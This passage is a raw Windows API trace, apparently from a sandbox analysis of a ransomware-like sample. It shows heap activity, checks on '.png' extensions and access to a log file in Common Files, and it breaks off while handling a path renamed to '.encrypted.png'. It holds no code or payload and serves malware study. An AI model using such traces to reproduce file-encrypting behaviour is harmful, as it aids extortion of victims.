HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.615] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.615] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.617] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.617] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.619] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.620] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x110) returned 0x7c5448 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.621] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.621] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.622] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x299d, lpOverlapped=0x0) returned 1 [0039.622] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x299d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.622] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.encrypted.png\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0039.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0039.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.encrypted.png\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, 